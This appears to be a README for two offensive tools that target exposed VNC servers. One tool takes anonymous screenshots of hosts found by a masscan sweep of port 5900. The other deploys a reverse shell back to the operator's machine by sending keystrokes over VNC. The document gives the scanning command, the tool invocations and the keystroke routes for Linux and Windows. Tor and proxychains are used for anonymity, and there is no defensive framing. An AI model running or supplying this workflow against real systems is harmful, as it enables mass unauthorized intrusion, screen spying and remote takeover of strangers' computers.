vncshooter will parse a textfile, extract all ip's, attempt to connect to the target via a vnc connection and anonymously take a screenshot. (requires tor, proxychains, vncsnapshot)
vncshitter can automatically place a reverse shell on a target, by anonymously sending keystrokes over a vnc connection (requires tor, proxychains, vncdotool)
use masscan to gather target ip's
sudo masscan -p5900 --resume paused.conf --rate 10000 >> 85.output
use vncshooter to take screens
./vncshooter 85.output
use vncshitter to deploy a shell
Usage: ./vncshitter --rhost=x.x.x.x [--rport=5900] [--lhost=x.x.x.x] [--rport=4444] [--platform=linux-gui]
[rhost] = Remote ip (required)
[rport] = Remote port (default: 5900)
[lhost] = Local host to bind default shell to (default: your external ip)
[lport] = Local port to bind default shell to (default: 4444)
[platform] = (default: linux-gui)
linux-gui: will work on default ubuntu etc (using alt+ctrl+t -> terminal -> payload)
win: will work on win7+ (using windows_key+r -> run -> cmd -> payload)